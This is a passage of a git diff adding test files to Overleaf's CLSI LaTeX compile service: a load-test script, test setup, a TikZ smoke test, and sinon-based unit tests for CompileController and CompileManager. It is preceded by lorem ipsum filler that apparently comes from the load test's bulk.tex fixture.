diam rhoncus sapien, quis tristique turpis lorem a mi. Nam bibendum, sem eget congue interdum, lacus orci convallis elit, ac porttitor lorem erat et orci. Integer elementum tortor et nisl posuere consectetur. Sed malesuada leo ac urna lacinia, malesuada luctus mauris faucibus. Duis consequat posuere lobortis. Cras interdum lacinia lacus. Cras ipsum sapien, porttitor eget pellentesque ut, aliquam ut magna. Integer luctus velit et elementum malesuada. Maecenas tempus mauris quis mollis posuere. + +Maecenas consequat urna elit, eget fringilla felis laoreet ac. In congue ullamcorper odio, sed malesuada turpis luctus sed. Nullam sodales interdum elit ac dignissim. Pellentesque placerat mollis velit, vulputate tristique neque aliquet vitae. Phasellus tempor viverra est, vitae vehicula justo imperdiet nec. Fusce dictum lacinia urna eget rhoncus. Nam imperdiet nisl orci, sed ultricies orci laoreet vel. In in pulvinar eros. Ut eu rhoncus eros. Suspendisse eu dui viverra, lacinia erat vitae, mattis metus. Aliquam vitae posuere sapien. Quisque eu lorem quis mi egestas varius. Aliquam erat volutpat. + +Duis eu arcu lobortis, vehicula orci ac, imperdiet dui. Etiam venenatis nisi quam, quis dapibus erat sagittis non. Suspendisse lacinia blandit interdum. Vivamus vitae sollicitudin leo. Vivamus sit amet commodo tellus, ac sagittis augue. Vivamus mi orci, ultricies ac nulla at, pharetra maximus diam. Nullam rhoncus volutpat magna eu auctor. + +Etiam commodo enim a leo pellentesque, in elementum odio lobortis. Vestibulum lobortis lobortis malesuada. Sed imperdiet ullamcorper viverra. Cras facilisis malesuada purus a consequat. Ut auctor neque mi, in scelerisque nibh ornare eu. In non dui in enim pretium ullamcorper non rutrum urna. Donec dictum porta orci sed malesuada. Morbi ac placerat felis. Aliquam lacus sem, ullamcorper sed laoreet ut, imperdiet non libero. Nunc non metus id justo accumsan ultricies. Donec in lacinia eros. Morbi non nunc diam. Aenean nisl massa, vestibulum vel fringilla vel, placerat eu leo. Sed feugiat malesuada ultricies. + +Nulla tristique massa eu tortor feugiat auctor. In viverra eu ex quis auctor. Praesent ac sapien orci. Proin sit amet orci posuere, ultricies orci in, fermentum justo. Vivamus tempus, ligula et aliquam egestas, enim orci pulvinar dui, in ultricies mauris turpis eu nisi. Pellentesque nec dui in ipsum laoreet convallis. Vestibulum a mi ornare, elementum ex sed, rhoncus neque. + +Nullam sed orci id sem tincidunt suscipit. Cras ac leo at magna facilisis blandit. Aliquam vitae tristique nisi. Nulla vestibulum felis pretium lectus commodo, id eleifend risus eleifend. Mauris bibendum facilisis est vitae scelerisque. Cras interdum dapibus ligula, nec porta lacus imperdiet at. Cras rhoncus bibendum lorem, congue mollis libero dignissim eget. Sed gravida, mauris sit amet sodales posuere, tellus felis imperdiet arcu, quis iaculis orci orci vitae ipsum. Curabitur id orci odio. Aliquam vitae rutrum lacus. + +Maecenas tristique est felis, eget posuere lorem dapibus non. Maecenas eu interdum lectus. Nullam placerat sit amet quam non hendrerit. Nulla facilisis ornare mollis. Cras sed metus facilisis, mattis dui in, auctor est. Morbi vehicula venenatis est, vitae egestas felis tincidunt vitae. Donec iaculis massa id justo ornare rhoncus. Nulla tempor felis ex, eu consectetur justo dictum sed. Integer eget laoreet nibh. Duis vitae pellentesque tellus, id blandit justo. Cras quis mollis eros. Quisque rhoncus dignissim enim at sollicitudin. Vestibulum sit amet diam sed quam sodales finibus. Nulla maximus orci sit amet porttitor vestibulum. Nam consequat urna at varius vulputate. + +Suspendisse laoreet luctus mauris. Aenean mollis felis urna, ac pretium nunc rutrum non. Aenean semper, risus vitae iaculis eleifend, odio ligula tempus nunc, sit amet suscipit nibh lorem quis ipsum. Nam et placerat sapien. In luctus accumsan risus, id pulvinar elit venenatis eu. Phasellus elementum leo urna, a dapibus neque facilisis eget. Sed sit amet tempor tortor. Fusce iaculis, ipsum nec faucibus scelerisque, felis tortor condimentum purus, in fringilla ex est ac nisl. Nunc et interdum diam. Donec venenatis, dolor quis dignissim euismod, libero ante elementum libero, vitae laoreet purus velit sit amet ipsum. Quisque urna tellus, imperdiet eget gravida a, fringilla commodo diam. + +In posuere nisi dictum tortor elementum iaculis. In dignissim diam sit amet volutpat elementum. Curabitur ultricies mi libero, sit amet feugiat massa viverra sed. Vivamus justo nibh, commodo nec elementum eu, suscipit vel elit. Fusce ac cursus libero, et volutpat augue. In tempus ultricies libero, ac rutrum mauris. Morbi vestibulum tellus eu dui dignissim euismod. In hac habitasse platea dictumst. + +Nam rhoncus hendrerit ex et mattis. Sed varius, arcu quis placerat viverra, ex lorem ultrices arcu, nec fringilla ipsum metus ut ligula. Sed in luctus mi. Pellentesque sed eros nisl. Praesent rutrum magna metus, vel efficitur eros lobortis efficitur. Mauris vestibulum urna at ligula lobortis sollicitudin. Aenean rhoncus auctor leo vel interdum. Cras sollicitudin massa leo, et eleifend metus scelerisque sit amet. Praesent dapibus euismod libero a fermentum. + +Curabitur cursus lacus sit amet est feugiat euismod. Nulla accumsan risus congue lorem facilisis scelerisque. In sed lectus elementum, porttitor nisl vulputate, pulvinar mi. Maecenas eu mollis odio. In faucibus sagittis magna, vitae mollis nisi iaculis non. Aenean dictum lectus ac arcu vehicula fringilla. Curabitur accumsan efficitur libero, eget consequat magna ultrices vel. Donec fermentum vel orci eget finibus. Etiam in massa ante. Mauris gravida enim lacus, sit amet accumsan massa suscipit a. Mauris id bibendum ex, et convallis nisl. Morbi luctus, orci in malesuada finibus, neque turpis convallis justo, id gravida sem purus eget turpis. Fusce eu laoreet justo. + +Nulla facilisi. Nulla varius risus quam, sit amet aliquam felis lacinia a. Ut sapien felis, tincidunt in pellentesque sit amet, vehicula id elit. Morbi a congue nunc. Sed justo neque, rutrum tincidunt hendrerit in, luctus at mauris. Suspendisse porttitor ex vitae felis luctus, et bibendum eros consequat. Maecenas vitae lectus eget est volutpat fermentum ac ac elit. In hac habitasse platea dictumst. Aenean luctus ex nec orci euismod aliquam. Integer a dolor elementum, mollis magna vitae, porta dui. In ac erat posuere, facilisis lacus eget, venenatis velit. Nulla ut sapien tincidunt, ultricies lectus aliquet, varius odio. Curabitur viverra congue ipsum, non finibus enim lobortis vitae. + +Duis vestibulum maximus est, sollicitudin dapibus sapien accumsan sit amet. Cras luctus, massa malesuada ornare imperdiet, dolor lorem blandit est, a blandit erat quam vel tortor. Vestibulum id semper ipsum. Ut nec ante eget velit fringilla sagittis. Duis sit amet lobortis nisi. Aenean interdum dui ut metus suscipit, a pretium tortor ultrices. Nullam tincidunt bibendum nisl, vitae tincidunt urna tincidunt tempus. Donec vitae porta sem. Phasellus venenatis egestas ligula, quis volutpat ipsum lacinia et. Pellentesque placerat ipsum elit, a feugiat libero scelerisque fringilla. Suspendisse ullamcorper congue nisi ut fringilla. Aliquam quis suscipit orci. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nam at nulla volutpat, viverra sem ac, blandit erat. Quisque gravida quam eu magna hendrerit, quis varius diam scelerisque. Suspendisse nisi enim, dignissim sit amet tristique ut, tempus sodales nibh. + +Nulla ac eleifend leo. Quisque laoreet finibus mattis. Nam est nulla, maximus sed luctus non, volutpat quis ipsum. Praesent et quam dolor. Nulla facilisi. Aliquam enim orci, volutpat vitae mattis pellentesque, fringilla ut eros. Fusce semper arcu et sapien rutrum laoreet. Maecenas vel imperdiet lectus. Mauris et pulvinar justo. Mauris sed luctus diam. Fusce a odio eget ante consequat volutpat. Nullam at lorem ut dui ornare aliquam nec non justo. Mauris turpis eros, blandit eget elementum ullamcorper, molestie vel quam. Aenean pretium interdum ligula ac fringilla. Aenean et felis lorem. Ut id lectus quis risus finibus condimentum. + +Curabitur aliquet quis justo sed posuere. Donec eu libero eget mi ullamcorper placerat. Etiam massa mi, lobortis eget fermentum in, facilisis vel lectus. In hac habitasse platea dictumst. Nam laoreet sodales metus, nec finibus nulla volutpat bibendum. Aenean ut vulputate dolor, vitae venenatis est. Fusce ipsum libero, laoreet sit amet justo at, auctor tristique arcu. Praesent pellentesque efficitur velit non accumsan. Proin fermentum tempus ante, at eleifend lectus fringilla sit amet. Nunc et diam ac velit tristique malesuada a id mauris. Sed euismod turpis lacus, a maximus dolor semper in. Nulla mauris tortor, dignissim vel mauris sed, efficitur ultrices nulla. Donec sed molestie libero. Quisque nec congue eros, ut consequat lectus. Suspendisse vitae tortor sapien. Sed vitae pellentesque dolor. + +Suspendisse dictum velit metus, vel mollis erat imperdiet ut. Mauris et sapien eleifend, malesuada ante vehicula, ornare tellus. Integer condimentum mattis risus, nec luctus lacus convallis a. Phasellus bibendum consequat nisi, ut consequat dui bibendum a. Sed venenatis lobortis turpis, a venenatis ex sodales eu. Duis sit amet sem dui. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla vitae tellus a ex tristique mattis. Quisque viverra vitae turpis accumsan imperdiet. Cras nunc erat, commodo et malesuada at, vulputate in lorem. Fusce tempor venenatis dui consequat auctor. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Suspendisse potenti. + +Fusce et ligula sem. In condimentum dolor metus, eu luctus justo ultrices nec. Aenean vitae ligula non erat tincidunt blandit. Pellentesque luctus tellus ante, mollis cursus arcu posuere a. Ut sed lacus suscipit, dapibus quam non, elementum purus. Nullam sed venenatis tortor, id luctus lacus. Suspendisse orci felis, porta et sagittis at, posuere vitae lectus. + +Cras in ligula ut mi viverra efficitur at sed erat. Donec congue suscipit orci, eu volutpat augue ultricies non. Maecenas imperdiet tincidunt commodo. Cras quis vulputate urna, et malesuada lorem. Donec id convallis nibh, non congue lacus. Curabitur et scelerisque nisl. Maecenas vestibulum elit ipsum, in posuere tortor placerat sit amet. Nullam nec ex eget libero mattis commodo a at leo. Vestibulum aliquet, eros quis facilisis aliquam, mi arcu aliquet nisl, in tempus massa sapien at tortor. + +Maecenas et dolor sed sapien lacinia fringilla eget et nibh. Aenean viverra urna sit amet lobortis vestibulum. Aliquam vehicula rutrum magna ut aliquam. Maecenas pharetra volutpat porttitor. In id ultricies sapien, a accumsan lectus. Fusce in elit a ex auctor rutrum sit amet ac lorem. Mauris eu mi a nisl vehicula mattis. Donec dictum velit nec libero bibendum, in volutpat metus viverra. Vivamus eget sollicitudin nunc, ac vestibulum erat. Sed dolor risus, semper nec lorem vitae, vehicula molestie purus. Quisque ac lectus iaculis, ultrices leo sit amet, mattis erat. Curabitur lorem mauris, vestibulum vel risus eu, molestie facilisis elit. Pellentesque habitant morbi tristique senectus et netus et volutpat. diff --git a/services/clsi/test/load/js/loadTest.js b/services/clsi/test/load/js/loadTest.js new file mode 100644 index 0000000..506b51b --- /dev/null +++ b/services/clsi/test/load/js/loadTest.js @@ -0,0 +1,101 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const request = require('request') +const Settings = require('@overleaf/settings') +const async = require('async') +const fs = require('node:fs') +const _ = require('lodash') +const concurentCompiles = 5 +const totalCompiles = 50 + +const buildUrl = path => + `http://${Settings.internal.clsi.host}:${Settings.internal.clsi.port}/${path}` + +const mainTexContent = fs.readFileSync('./bulk.tex', 'utf-8') + +const compileTimes = [] +let failedCount = 0 + +const getAverageCompileTime = function () { + const totalTime = _.reduce(compileTimes, (sum, time) => sum + time, 0) + return totalTime / compileTimes.length +} + +const makeRequest = function (compileNumber, callback) { + let bulkBodyCount = 7 + let bodyContent = '' + while (--bulkBodyCount) { + bodyContent = bodyContent += mainTexContent + } + + const startTime = new Date() + return request.post( + { + url: buildUrl(`project/loadcompile-${compileNumber}/compile`), + json: { + compile: { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\begin{document} +${bodyContent} +\\end{document}\ +`, + }, + ], + }, + }, + }, + (err, response, body) => { + if (err != null) { + failedCount++ + return callback(new Error(`compile ${compileNumber} failed`)) + } + if (response.statusCode !== 200) { + failedCount++ + return callback(new Error(`compile ${compileNumber} failed`)) + } + const totalTime = new Date() - startTime + console.log(totalTime + 'ms') + compileTimes.push(totalTime) + return callback(err) + } + ) +} + +const jobs = _.map( + __range__(1, totalCompiles, true), + i => cb => makeRequest(i, cb) +) + +const startTime = new Date() +async.parallelLimit(jobs, concurentCompiles, err => { + if (err != null) { + console.error(err) + } + console.log(`total time taken = ${(new Date() - startTime) / 1000}s`) + console.log(`total compiles = ${totalCompiles}`) + console.log(`concurent compiles = ${concurentCompiles}`) + console.log(`average time = ${getAverageCompileTime() / 1000}s`) + console.log(`max time = ${_.max(compileTimes) / 1000}s`) + console.log(`min time = ${_.min(compileTimes) / 1000}s`) + return console.log(`total failures = ${failedCount}`) +}) + +function __range__(left, right, inclusive) { + const range = [] + const ascending = left < right + const end = !inclusive ? right : ascending ? right + 1 : right - 1 + for (let i = left; ascending ? i < end : i > end; ascending ? i++ : i--) { + range.push(i) + } + return range +} diff --git a/services/clsi/test/setup.js b/services/clsi/test/setup.js new file mode 100644 index 0000000..b17507b --- /dev/null +++ b/services/clsi/test/setup.js @@ -0,0 +1,29 @@ +const chai = require('chai') +const sinonChai = require('sinon-chai') +const chaiAsPromised = require('chai-as-promised') +const SandboxedModule = require('sandboxed-module') + +// Setup chai +chai.should() +chai.use(sinonChai) +chai.use(chaiAsPromised) + +// Global SandboxedModule settings +SandboxedModule.configure({ + requires: { + '@overleaf/logger': { + debug() {}, + log() {}, + info() {}, + warn() {}, + error() {}, + err() {}, + }, + }, + globals: { Buffer, console, process, URL, Math }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/services/clsi/test/smoke/js/SmokeTests.js b/services/clsi/test/smoke/js/SmokeTests.js new file mode 100644 index 0000000..18aa562 --- /dev/null +++ b/services/clsi/test/smoke/js/SmokeTests.js @@ -0,0 +1,108 @@ +const request = require('request') +const Settings = require('@overleaf/settings') + +const buildUrl = path => + `http://${Settings.internal.clsi.host}:${Settings.internal.clsi.port}/${path}` + +const url = buildUrl(`project/smoketest-${process.pid}/compile`) + +module.exports = { + sendNewResult(res) { + this._run(error => this._sendResponse(res, error)) + }, + sendLastResult(res) { + this._sendResponse(res, this._lastError) + }, + triggerRun(cb) { + this._run(error => { + this._lastError = error + cb(error) + }) + }, + lastRunSuccessful() { + return this._lastError == null + }, + + _lastError: new Error('SmokeTestsPending'), + _sendResponse(res, error) { + let code, body + if (error) { + code = 500 + body = error.message + } else { + code = 200 + body = 'OK' + } + res.contentType('text/plain') + res.status(code).send(body) + }, + _run(done) { + request.post( + { + url, + json: { + compile: { + options: { + metricsPath: 'health-check', + }, + resources: [ + { + path: 'main.tex', + content: `\ +% Membrane-like surface +% Author: Yotam Avital +\\documentclass{article} +\\usepackage{tikz} +\\usetikzlibrary{calc,fadings,decorations.pathreplacing} +\\begin{document} +\\begin{tikzpicture} + \\def\\nuPi{3.1459265} + \\foreach \\i in {5,4,...,2}{% This one doesn't matter + \\foreach \\j in {3,2,...,0}{% This will crate a membrane + % with the front lipids visible + % top layer + \\pgfmathsetmacro{\\dx}{rand*0.1}% A random variance in the x coordinate + \\pgfmathsetmacro{\\dy}{rand*0.1}% A random variance in the y coordinate, + % gives a hight fill to the lipid + \\pgfmathsetmacro{\\rot}{rand*0.1}% A random variance in the + % molecule orientation + \\shade[ball color=red] ({\\i+\\dx+\\rot},{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)}) circle(0.45); + \\shade[ball color=gray] (\\i+\\dx,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-0.9}) circle(0.45); + \\shade[ball color=gray] (\\i+\\dx-\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-1.8}) circle(0.45); + % bottom layer + \\pgfmathsetmacro{\\dx}{rand*0.1} + \\pgfmathsetmacro{\\dy}{rand*0.1} + \\pgfmathsetmacro{\\rot}{rand*0.1} + \\shade[ball color=gray] (\\i+\\dx+\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-2.8}) circle(0.45); + \\shade[ball color=gray] (\\i+\\dx,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-3.7}) circle(0.45); + \\shade[ball color=red] (\\i+\\dx-\\rot,{0.5*\\j+\\dy+0.4*sin(\\i*\\nuPi*10)-4.6}) circle(0.45); + } + } +\\end{tikzpicture} +\\end{document}\ +`, + }, + ], + }, + }, + }, + (error, response, body) => { + if (error) return done(error) + if (!body || !body.compile || !body.compile.outputFiles) { + return done(new Error('response payload incomplete')) + } + + let pdfFound = false + let logFound = false + for (const file of body.compile.outputFiles) { + if (file.type === 'pdf') pdfFound = true + if (file.type === 'log') logFound = true + } + + if (!pdfFound) return done(new Error('no pdf returned')) + if (!logFound) return done(new Error('no log returned')) + done() + } + ) + }, +} diff --git a/services/clsi/test/unit/js/CompileControllerTests.js b/services/clsi/test/unit/js/CompileControllerTests.js new file mode 100644 index 0000000..e6d21ae --- /dev/null +++ b/services/clsi/test/unit/js/CompileControllerTests.js @@ -0,0 +1,497 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/CompileController' +) +const Errors = require('../../../app/js/Errors') + +describe('CompileController', function () { + beforeEach(function () { + this.buildId = 'build-id-123' + this.CompileController = SandboxedModule.require(modulePath, { + requires: { + './CompileManager': (this.CompileManager = {}), + './RequestParser': (this.RequestParser = {}), + '@overleaf/settings': (this.Settings = { + apis: { + clsi: { + url: 'http://clsi.example.com', + outputUrlPrefix: '/zone/b', + downloadHost: 'http://localhost:3013', + }, + clsiCache: { + enabled: false, + url: 'http://localhost:3044', + }, + }, + }), + '@overleaf/metrics': { + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + './ProjectPersistenceManager': (this.ProjectPersistenceManager = {}), + './CLSICacheHandler': { + notifyCLSICacheAboutBuild: sinon.stub(), + downloadLatestCompileCache: sinon.stub().resolves(), + downloadOutputDotSynctexFromCompileCache: sinon.stub().resolves(), + }, + './Errors': (this.Erros = Errors), + }, + }) + this.Settings.externalUrl = 'http://www.example.com' + this.req = {} + this.res = {} + this.next = sinon.stub() + }) + + describe('compile', function () { + beforeEach(function () { + this.req.body = { + compile: 'mock-body', + } + this.req.params = { project_id: (this.project_id = 'project-id-123') } + this.request = { + compile: 'mock-parsed-request', + } + this.request_with_project_id = { + compile: this.request.compile, + project_id: this.project_id, + } + this.output_files = [ + { + path: 'output.pdf', + type: 'pdf', + size: 1337, + build: 1234, + }, + { + path: 'output.log', + type: 'log', + build: 1234, + }, + ] + this.RequestParser.parse = sinon + .stub() + .callsArgWith(1, null, this.request) + this.ProjectPersistenceManager.markProjectAsJustAccessed = sinon + .stub() + .callsArg(1) + this.stats = { foo: 1 } + this.timings = { bar: 2 } + this.res.status = sinon.stub().returnsThis() + this.res.send = sinon.stub() + + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(null, { + outputFiles: this.output_files, + buildId: this.buildId, + }) + }) + }) + + describe('successfully', function () { + beforeEach(function () { + this.CompileController.compile(this.req, this.res) + }) + + it('should parse the request', function () { + this.RequestParser.parse.calledWith(this.req.body).should.equal(true) + }) + + it('should run the compile for the specified project', function () { + this.CompileManager.doCompileWithLock + .calledWith(this.request_with_project_id) + .should.equal(true) + }) + + it('should mark the project as accessed', function () { + this.ProjectPersistenceManager.markProjectAsJustAccessed + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return the JSON response', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'success', + error: null, + stats: this.stats, + timings: this.timings, + buildId: this.buildId, + outputUrlPrefix: '/zone/b', + outputFiles: this.output_files.map(file => ({ + url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + .should.equal(true) + }) + }) + + describe('without a outputUrlPrefix', function () { + beforeEach(function () { + this.Settings.apis.clsi.outputUrlPrefix = '' + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with empty outputUrlPrefix', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'success', + error: null, + stats: this.stats, + timings: this.timings, + buildId: this.buildId, + outputUrlPrefix: '', + outputFiles: this.output_files.map(file => ({ + url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + .should.equal(true) + }) + }) + + describe('with user provided fake_output.pdf', function () { + beforeEach(function () { + this.output_files = [ + { + path: 'fake_output.pdf', + type: 'pdf', + build: 1234, + }, + { + path: 'output.log', + type: 'log', + build: 1234, + }, + ] + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(null, { + outputFiles: this.output_files, + buildId: this.buildId, + }) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with status failure', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send.should.have.been.calledWith({ + compile: { + status: 'failure', + error: null, + stats: this.stats, + timings: this.timings, + outputUrlPrefix: '/zone/b', + buildId: this.buildId, + outputFiles: this.output_files.map(file => ({ + url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + }) + }) + + describe('with an empty output.pdf', function () { + beforeEach(function () { + this.output_files = [ + { + path: 'output.pdf', + type: 'pdf', + size: 0, + build: 1234, + }, + { + path: 'output.log', + type: 'log', + build: 1234, + }, + ] + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(null, { + outputFiles: this.output_files, + buildId: this.buildId, + }) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with status failure', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send.should.have.been.calledWith({ + compile: { + status: 'failure', + error: null, + stats: this.stats, + buildId: this.buildId, + timings: this.timings, + outputUrlPrefix: '/zone/b', + outputFiles: this.output_files.map(file => ({ + url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + }) + }) + + describe('with an error', function () { + beforeEach(function () { + const error = new Error((this.message = 'error message')) + error.buildId = this.buildId + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the error', function () { + this.res.status.calledWith(500).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'error', + error: this.message, + outputUrlPrefix: '/zone/b', + outputFiles: [], + buildId: this.buildId, + stats: this.stats, + timings: this.timings, + }, + }) + .should.equal(true) + }) + }) + + describe('with too many compile requests error', function () { + beforeEach(function () { + const error = new Errors.TooManyCompileRequestsError( + 'too many concurrent compile requests' + ) + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the error', function () { + this.res.status.calledWith(503).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'unavailable', + error: 'too many concurrent compile requests', + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + + describe('when the request times out', function () { + beforeEach(function () { + this.error = new Error((this.message = 'container timed out')) + this.error.timedout = true + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(this.error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the timeout status', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'timedout', + error: this.message, + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + + describe('when the request returns no output files', function () { + beforeEach(function () { + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(null, {}) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the failure status', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + error: null, + status: 'failure', + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + }) + + describe('syncFromCode', function () { + beforeEach(function () { + this.file = 'main.tex' + this.line = 42 + this.column = 5 + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + file: this.file, + line: this.line.toString(), + column: this.column.toString(), + } + this.res.json = sinon.stub() + + this.CompileManager.syncFromCode = sinon + .stub() + .yields(null, (this.pdfPositions = ['mock-positions'])) + this.CompileController.syncFromCode(this.req, this.res, this.next) + }) + + it('should find the corresponding location in the PDF', function () { + this.CompileManager.syncFromCode + .calledWith( + this.project_id, + undefined, + this.file, + this.line, + this.column + ) + .should.equal(true) + }) + + it('should return the positions', function () { + this.res.json + .calledWith({ + pdf: this.pdfPositions, + }) + .should.equal(true) + }) + }) + + describe('syncFromPdf', function () { + beforeEach(function () { + this.page = 5 + this.h = 100.23 + this.v = 45.67 + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + page: this.page.toString(), + h: this.h.toString(), + v: this.v.toString(), + } + this.res.json = sinon.stub() + + this.CompileManager.syncFromPdf = sinon + .stub() + .yields(null, (this.codePositions = ['mock-positions'])) + this.CompileController.syncFromPdf(this.req, this.res, this.next) + }) + + it('should find the corresponding location in the code', function () { + this.CompileManager.syncFromPdf + .calledWith(this.project_id, undefined, this.page, this.h, this.v) + .should.equal(true) + }) + + it('should return the positions', function () { + this.res.json + .calledWith({ + code: this.codePositions, + }) + .should.equal(true) + }) + }) + + describe('wordcount', function () { + beforeEach(function () { + this.file = 'main.tex' + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + file: this.file, + image: (this.image = 'example.com/image'), + } + this.res.json = sinon.stub() + + this.CompileManager.wordcount = sinon + .stub() + .callsArgWith(4, null, (this.texcount = ['mock-texcount'])) + }) + + it('should return the word count of a file', function () { + this.CompileController.wordcount(this.req, this.res, this.next) + this.CompileManager.wordcount + .calledWith(this.project_id, undefined, this.file, this.image) + .should.equal(true) + }) + + it('should return the texcount info', function () { + this.CompileController.wordcount(this.req, this.res, this.next) + this.res.json + .calledWith({ + texcount: this.texcount, + }) + .should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/CompileManagerTests.js b/services/clsi/test/unit/js/CompileManagerTests.js new file mode 100644 index 0000000..33a43ae --- /dev/null +++ b/services/clsi/test/unit/js/CompileManagerTests.js @@ -0,0 +1,627 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') +const sinon = require('sinon') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/CompileManager' +) + +describe('CompileManager', function () { + beforeEach(function () { + this.projectId = 'project-id-123' + this.userId = '1234' + this.resources = 'mock-resources' + this.outputFiles = [ + { + path: 'output.log', + type: 'log', + }, + { + path: 'output.pdf', + type: 'pdf', + }, + ] + this.buildFiles = [ + { + path: 'output.log', + type: 'log', + build: 1234, + }, + { + path: 'output.pdf', + type: 'pdf', + build: 1234, + }, + ] + this.buildId = 'build-id-123' + this.commandOutput = 'Dummy output' + this.compileBaseDir = '/compile/dir' + this.outputBaseDir = '/output/dir' + this.compileDir = `${this.compileBaseDir}/${this.projectId}-${this.userId}` + this.outputDir = `${this.outputBaseDir}/${this.projectId}-${this.userId}` + + this.LatexRunner = { + promises: { + runLatex: sinon.stub().resolves({}), + }, + } + this.ResourceWriter = { + promises: { + syncResourcesToDisk: sinon.stub().resolves(this.resources), + }, + } + this.OutputFileFinder = { + promises: { + findOutputFiles: sinon.stub().resolves({ + outputFiles: this.outputFiles, + allEntries: this.outputFiles.map(f => f.path).concat(['main.tex']), + }), + }, + } + this.OutputCacheManager = { + promises: { + queueDirOperation: sinon.stub().callsArg(1), + saveOutputFiles: sinon + .stub() + .resolves({ outputFiles: this.buildFiles, buildId: this.buildId }), + }, + } + this.Settings = { + path: { + compilesDir: this.compileBaseDir, + outputDir: this.outputBaseDir, + synctexBaseDir: sinon.stub(), + }, + clsi: { + docker: { + image: 'SOMEIMAGE', + }, + }, + } + this.Settings.path.synctexBaseDir + .withArgs(`${this.projectId}-${this.userId}`) + .returns(this.compileDir) + this.child_process = { + exec: sinon.stub(), + execFile: sinon.stub().yields(), + } + this.CommandRunner = { + promises: { + run: sinon.stub().callsFake((_1, _2, _3, _4, _5, _6, compileGroup) => { + if (compileGroup === 'synctex') { + return Promise.resolve({ stdout: this.commandOutput }) + } else { + return Promise.resolve({ + stdout: 'Encoding: ascii\nWords in text: 2', + }) + } + }), + }, + } + this.DraftModeManager = { + promises: { + injectDraftMode: sinon.stub().resolves(), + }, + } + this.TikzManager = { + promises: { + checkMainFile: sinon.stub().resolves(false), + }, + } + this.lock = { + release: sinon.stub(), + } + this.LockManager = { + acquire: sinon.stub().returns(this.lock), + } + this.SynctexOutputParser = { + 